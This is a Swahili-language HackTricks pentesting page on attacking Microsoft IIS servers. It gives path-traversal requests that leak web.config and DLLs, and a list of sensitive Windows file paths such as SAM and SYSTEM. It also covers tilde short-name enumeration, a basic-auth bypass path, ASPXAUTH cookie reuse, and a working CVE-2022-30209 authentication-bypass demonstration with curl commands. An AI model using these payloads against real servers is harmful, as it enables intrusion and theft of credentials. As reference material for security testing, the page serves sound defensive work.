Swahili - Ht
HackTricks Training Twitter Linkedin Sponsor

IIS - Internet Information Services

Support HackTricks

WhiteIntel

WhiteIntel ni injini ya utafutaji inayotumiwa na dark-web ambayo inatoa kazi za bure kuangalia kama kampuni au wateja wake wamekuwa compromised na stealer malwares.

Lengo lao kuu la WhiteIntel ni kupambana na kuchukuliwa kwa akaunti na mashambulizi ya ransomware yanayotokana na malware inayopora taarifa.

Unaweza kuangalia tovuti yao na kujaribu injini yao kwa bure kwenye:

Test executable file extensions:

  • asp

  • aspx

  • config

  • php

Internal IP Address disclosure

Katika seva yoyote ya IIS ambapo unapata 302 unaweza kujaribu kuondoa kichwa cha Host na kutumia HTTP/1.0 na ndani ya jibu kichwa cha Location kinaweza kukuongoza kwenye anwani ya IP ya ndani:

nc -v domain.com 80
openssl s_client -connect domain.com:443

Majibu yanayofichua IP ya ndani:

GET / HTTP/1.0

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
Location: https://192.168.5.237/owa/
Server: Microsoft-IIS/10.0
X-FEServer: NHEXCHANGE2016

Execute .config files

Unaweza kupakia faili za .config na kuzitumia kutekeleza msimbo. Njia moja ya kufanya hivyo ni kuongeza msimbo mwishoni mwa faili ndani ya maoni ya HTML: Download example here

Taarifa zaidi na mbinu za kutumia udhaifu huu here

IIS Discovery Bruteforce

Pakua orodha niliyounda:

Ilianzishwa kwa kuunganisha maudhui ya orodha zifuatazo:

https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt

Tumia bila kuongeza kiambatisho chochote, faili zinazohitaji zinao tayari.

Path Traversal

Leaking source code

Angalia andiko kamili katika: https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html

Kwa muhtasari, kuna faili kadhaa za web.config ndani ya folda za programu zikiwa na viungo kwa faili za "assemblyIdentity" na "namespaces". Kwa taarifa hii inawezekana kujua wapi executable ziko na kuzipakua. Kutoka kwa Dlls zilizopakuliwa pia inawezekana kupata namespaces mpya ambapo unapaswa kujaribu kufikia na kupata faili ya web.config ili kupata namespaces mpya na assemblyIdentity. Pia, faili connectionstrings.config na global.asax zinaweza kuwa na taarifa za kuvutia.\

Katika .Net MVC applications, faili ya web.config ina jukumu muhimu kwa kuainisha kila faili la binary ambalo programu inategemea kupitia lebo za XML za "assemblyIdentity".

Exploring Binary Files

Mfano wa kufikia faili ya web.config umeonyeshwa hapa chini:

GET /download_page?id=..%2f..%2fweb.config HTTP/1.1
Host: example-mvc-application.minded

Hii ombi linaonyesha mipangilio na utegemezi mbalimbali, kama vile:

  • EntityFramework toleo

  • AppSettings kwa ajili ya kurasa za wavuti, uthibitishaji wa mteja, na JavaScript

  • System.web mipangilio ya uthibitishaji na wakati wa kukimbia

  • System.webServer mipangilio ya moduli

  • Runtime uhusiano wa maktaba kwa maktaba nyingi kama Microsoft.Owin, Newtonsoft.Json, na System.Web.Mvc

Mipangilio hii inaonyesha kwamba faili fulani, kama /bin/WebGrease.dll, ziko ndani ya folda ya /bin ya programu.

Faili za Saraka Kuu

Faili zinazopatikana katika saraka kuu, kama /global.asax na /connectionstrings.config (ambayo ina nywila nyeti), ni muhimu kwa usanidi na uendeshaji wa programu.

Namespaces na Web.Config

Programu za MVC pia zinafafanua web.config files za ziada kwa ajili ya namespaces maalum ili kuepuka matamko ya kurudiwa katika kila faili, kama inavyoonyeshwa na ombi la kupakua web.config nyingine:

GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
Host: example-mvc-application.minded

Kupakua DLLs

Kurejelewa kwa jina la kawaida la desturi kunaashiria DLL inayoitwa "WebApplication1" iliyopo katika saraka ya /bin. Kufuatia hii, ombi la kupakua WebApplication1.dll linaonyeshwa:

GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
Host: example-mvc-application.minded

Hii inamaanisha uwepo wa DLL nyingine muhimu, kama System.Web.Mvc.dll na System.Web.Optimization.dll, katika saraka ya /bin.

Katika hali ambapo DLL inapata namespace inayoitwa WebApplication1.Areas.Minded, mshambuliaji anaweza kudhani uwepo wa faili nyingine za web.config katika njia zinazoweza kutabiriwa, kama /area-name/Views/, zikiwa na mipangilio maalum na marejeleo kwa DLL nyingine katika folda ya /bin. Kwa mfano, ombi kwa /Minded/Views/web.config linaweza kufichua mipangilio na namespaces zinazodhihirisha uwepo wa DLL nyingine, WebApplication1.AdditionalFeatures.dll.

Faili za kawaida

Kutoka hapa

C:\Apache\conf\httpd.conf
C:\Apache\logs\access.log
C:\Apache\logs\error.log
C:\Apache2\conf\httpd.conf
C:\Apache2\logs\access.log
C:\Apache2\logs\error.log
C:\Apache22\conf\httpd.conf
C:\Apache22\logs\access.log
C:\Apache22\logs\error.log
C:\Apache24\conf\httpd.conf
C:\Apache24\logs\access.log
C:\Apache24\logs\error.log
C:\Documents and Settings\Administrator\NTUser.dat
C:\php\php.ini
C:\php4\php.ini
C:\php5\php.ini
C:\php7\php.ini
C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache\logs\access.log
C:\Program Files (x86)\Apache Group\Apache\logs\error.log
C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache2\logs\access.log
C:\Program Files (x86)\Apache Group\Apache2\logs\error.log
c:\Program Files (x86)\php\php.ini"
C:\Program Files\Apache Group\Apache\conf\httpd.conf
C:\Program Files\Apache Group\Apache\conf\logs\access.log
C:\Program Files\Apache Group\Apache\conf\logs\error.log
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
C:\Program Files\Apache Group\Apache2\conf\logs\access.log
C:\Program Files\Apache Group\Apache2\conf\logs\error.log
C:\Program Files\FileZilla Server\FileZilla Server.xml
C:\Program Files\MySQL\my.cnf
C:\Program Files\MySQL\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.1\my.cnf
C:\Program Files\MySQL\MySQL Server 5.1\my.ini
C:\Program Files\MySQL\MySQL Server 5.5\my.cnf
C:\Program Files\MySQL\MySQL Server 5.5\my.ini
C:\Program Files\MySQL\MySQL Server 5.6\my.cnf
C:\Program Files\MySQL\MySQL Server 5.6\my.ini
C:\Program Files\MySQL\MySQL Server 5.7\my.cnf
C:\Program Files\MySQL\MySQL Server 5.7\my.ini
C:\Program Files\php\php.ini
C:\Users\Administrator\NTUser.dat
C:\Windows\debug\NetSetup.LOG
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\php.ini
C:\Windows\repair\SAM
C:\Windows\repair\system
C:\Windows\System32\config\AppEvent.evt
C:\Windows\System32\config\RegBack\SAM
C:\Windows\System32\config\RegBack\system
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SecEvent.evt
C:\Windows\System32\config\SysEvent.evt
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\winevt\Logs\Application.evtx
C:\Windows\System32\winevt\Logs\Security.evtx
C:\Windows\System32\winevt\Logs\System.evtx
C:\Windows\win.ini
C:\xampp\apache\conf\extra\httpd-xampp.conf
C:\xampp\apache\conf\httpd.conf
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
C:\xampp\FileZillaFTP\FileZilla Server.xml
C:\xampp\MercuryMail\MERCURY.INI
C:\xampp\mysql\bin\my.ini
C:\xampp\php\php.ini
C:\xampp\security\webdav.htpasswd
C:\xampp\sendmail\sendmail.ini
C:\xampp\tomcat\conf\server.xml

HTTPAPI 2.0 404 Error

Ikiwa unaona kosa kama ifuatavyo:

Inamaanisha kwamba seva haikupata jina sahihi la kikoa ndani ya kichwa cha Host. Ili kufikia ukurasa wa wavuti unaweza kuangalia Cheti cha SSL kilichotolewa na labda unaweza kupata jina la kikoa/subdomain huko. Ikiwa halipo unaweza kuhitaji brute force VHosts hadi upate sahihi.

Uthibitisho wa zamani wa IIS unaofaa kutafuta

Microsoft IIS herufi ya tilde “~” Uthibitisho/Feature – Ufichuzi wa Jina la Faili/Folda Fupi

Unaweza kujaribu kuorodhesha folda na faili ndani ya kila folda iliyogunduliwa (hata kama inahitaji Uthibitisho wa Msingi) ukitumia mbinu hii. Kikomo kikuu cha mbinu hii ikiwa seva ina udhaifu ni kwamba inaweza tu kupata hadi herufi 6 za kwanza za jina la kila faili/folda na herufi 3 za kwanza za kiendelezi cha faili.

Unaweza kutumia https://github.com/irsdl/IIS-ShortName-Scanner kujaribu udhaifu huu:java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/

Utafiti wa asili: https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf

Unaweza pia kutumia metasploit: use scanner/http/iis_shortname_scanner

Kuepuka Uthibitisho wa Msingi

Kuepuka uthibitisho wa msingi (IIS 7.5) ukijaribu kufikia: /admin:$i30:$INDEX_ALLOCATION/admin.php au /admin::$INDEX_ALLOCATION/admin.php

Unaweza kujaribu kuchanganya udhaifu huu na wa mwisho ili kupata folda mpya na kuepuka uthibitisho.

Ufuatiliaji wa ASP.NET Trace.AXD ulioanzishwa

ASP.NET inajumuisha hali ya ufuatiliaji na faili yake inaitwa trace.axd.

Inahifadhi kumbukumbu ya kina ya maombi yote yaliyofanywa kwa programu kwa kipindi cha muda.

Taarifa hii inajumuisha IP za wateja wa mbali, vitambulisho vya kikao, vidakuzi vyote vya maombi na majibu, njia za kimwili, taarifa za msimbo wa chanzo, na labda hata majina ya watumiaji na nywila.

https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/

ASPXAUTH Cookie

ASPXAUTH inatumia taarifa zifuatazo:

  • validationKey (string): ufunguo wa hex-encoded wa kutumia kwa uthibitisho wa saini.

  • decryptionMethod (string): (default “AES”).

  • decryptionIV (string): hex-encoded initialization vector (inategemea vector ya sifuri).

  • decryptionKey (string): ufunguo wa hex-encoded wa kutumia kwa ufichuzi.

Hata hivyo, watu wengine watachukua thamani za msingi za vigezo hivi na watatumia kama cookie barua pepe ya mtumiaji. Hivyo, ikiwa unaweza kupata wavuti inayotumia jukwaa sawa ambalo linatumia cookie ya ASPXAUTH na wewe unaunda mtumiaji kwa barua pepe ya mtumiaji unayependa kuiga kwenye seva inayoshambuliwa, unaweza kuwa na uwezo wa kutumia cookie kutoka seva ya pili kwenye ya kwanza na kuiga mtumiaji. Shambulio hili lilifanya kazi katika andiko hili.

Kuepuka Uthibitisho wa IIS na nywila zilizohifadhiwa (CVE-2022-30209)

Ripoti kamili hapa: Kosa katika msimbo halikupitia ipasavyo nywila iliyotolewa na mtumiaji, hivyo mshambuliaji ambaye hash ya nywila yake inagonga ufunguo ambao tayari uko kwenye cache ataweza kuingia kama mtumiaji huyo.

# script for sanity check
> type test.py
def HashString(password):
j = 0
for c in map(ord, password):
j = c + (101*j)&0xffffffff
return j

assert HashString('test-for-CVE-2022-30209-auth-bypass') == HashString('ZeeiJT')

# before the successful login
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 401 Unauthorized

# after the successful login
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 200 OK

WhiteIntel

WhiteIntel ni injini ya kutafuta inayotumiwa na dark-web ambayo inatoa kazi za bure kuangalia kama kampuni au wateja wake wamekuwa compromised na stealer malwares.

Lengo lao kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulizi ya ransomware yanayotokana na malware inayopora taarifa.

Unaweza kuangalia tovuti yao na kujaribu injini yao kwa bure kwenye:

Support HackTricks
PreviousH2 - Java SQL databaseNextImageMagick Security

Last updated